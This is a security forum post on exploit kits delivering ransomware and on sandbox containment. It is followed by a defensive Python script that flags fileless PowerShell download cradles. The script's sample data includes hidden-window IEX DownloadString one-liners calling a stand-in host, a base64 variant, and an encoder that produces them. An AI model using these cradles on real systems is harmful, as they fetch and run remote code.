More Fun with Ransomware Part 5
cruelsister wrote (post 514057):

Let me address the last point first: the Angler EK that you referenced above is to the point. The infection of systems is becoming quite common. Although Angler is still widely used (I believe that link was from 2014), things have branched out to other EKs like pseudo-darkleech, Hunter, and Neutrino. But all currently are doing pretty much the same thing, and that is the exploitation of Flash/Shockwave to deliver malware.

The initial malicious action, whether by swf or js files, would be contained in the sandbox if you have your browser sandboxed. To see this (safely) for yourself, just keep the browser sandboxed and go to either a Java or Flash or Shockwave test site and try to run the test. Then check out what is in the sandbox as well as the blocked intrusions. This is a backhanded way of seeing how an exploit would be handled.

Secondly, these exploits invariably will connect to Command to do the actual downloading of a payload. If (when) the payload is autorun it would be treated as any other piece of malware by Comodo. I've done this a number of times with various Exploit Kits trying to run CryptXXX and still have not been able to trash the system. The worst scenario (still not seen in the Wild) would be a high quality signed payload. This I will deal with in Part 5 of the current (and currently sidetracked) RAT series.

Finally, PowerShell is also used frequently in Fileless attacks. As noted in my post above, this would be handled as a normal scriptor attack and would be brushed off. I've made numerous videos on scriptors.

Hope this helped.

M
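The post's last point, that a fileless PowerShell stage is "handled as a normal scriptor attack", comes down to recognising the launcher command line before it writes anything to disk. The following is an added example written for this page, not code from the post's author or from Comodo: a small heuristic scorer for process-creation command lines that flags the usual download-cradle building blocks (DownloadString/IEX, hidden window, -nop, execution-policy bypass) and decodes -EncodedCommand payloads, which are base64 of UTF-16LE text, so that a cradle hidden behind encoding is scored the same as a plain one. The indicator names, weights, threshold and sample command lines are constructed assumptions, not captured data.

```python
"""Flag PowerShell command lines that look like fileless download cradles.

Added example for this page: a stand-alone heuristic, not Comodo's logic
and not anything the post's author published. The sample event lines are
constructed, not captured from a real incident.
"""
import base64
import re
from dataclasses import dataclass, field

# (name, pattern, weight). Weights are assumptions chosen so that one launcher
# flag alone stays below the threshold but a flag plus an in-memory execution
# primitive crosses it.
INDICATORS = [
    ("download_cradle", re.compile(r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient)", re.I), 3),
    ("in_memory_exec", re.compile(r"(invoke-expression|\biex\b)", re.I), 3),
    ("encoded_command", re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I), 3),
    ("hidden_window", re.compile(r"-w(indowstyle)?\s+hidden", re.I), 1),
    ("no_profile", re.compile(r"-nop(rofile)?\b", re.I), 1),
    ("bypass_policy", re.compile(r"-ep\s+bypass|-executionpolicy\s+bypass", re.I), 1),
    ("reflective_load", re.compile(r"\[reflection\.assembly\]::load|frombase64string", re.I), 2),
]

THRESHOLD = 4  # assumption: tune against a baseline of your own admin scripts


@dataclass
class Verdict:
    line: str
    score: int
    hits: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return self.score >= THRESHOLD


def encode_for_powershell(script: str) -> str:
    """Produce what an attacker passes to -EncodedCommand: base64 of UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> str:
    """Return the decoded -EncodedCommand payload, or '' if absent or undecodable.

    PowerShell expects base64 of a UTF-16LE string here, so the bytes must be
    decoded as UTF-16LE rather than UTF-8.
    """
    m = re.search(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", cmdline, re.I)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def score_command_line(cmdline: str) -> Verdict:
    """Score one process-creation command line against the indicator list."""
    # Append the decoded payload so indicators hidden by encoding count too.
    text = cmdline + " " + decode_encoded_command(cmdline)
    verdict = Verdict(line=cmdline, score=0)
    for name, pattern, weight in INDICATORS:
        if pattern.search(text):
            verdict.hits.append(name)
            verdict.score += weight
    return verdict


def triage(events):
    """Return verdicts for the events that cross the threshold, in input order."""
    return [v for v in (score_command_line(e) for e in events) if v.suspicious]


# Constructed sample command lines (assumption; not real telemetry).
SAMPLE_EVENTS = [
    # Benign admin usage: one launcher flag, no download or in-memory execution.
    'powershell.exe -NoProfile -Command "Get-Service | Where-Object Status -eq Running"',
    # Classic cradle: hidden window, policy bypass, download and IEX in one line.
    "powershell.exe -nop -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')\"",
    # The same cradle hidden behind -EncodedCommand.
    "powershell.exe -w hidden -enc "
    + encode_for_powershell("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/b')"),
    # Benign scheduled task: bypass alone does not cross the threshold.
    "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1",
]

if __name__ == "__main__":
    for v in triage(SAMPLE_EVENTS):
        print(v.score, v.hits, v.line[:60])
```

Run as a script it prints only the two cradles; the decoder is what keeps the encoded variant from scoring lower than the plain one. The threshold and weights are a starting point: a legitimate software deployment script may well use -NoProfile with -ExecutionPolicy Bypass, so the scorer deliberately needs a download or in-memory execution primitive on top of the launcher flags before it fires.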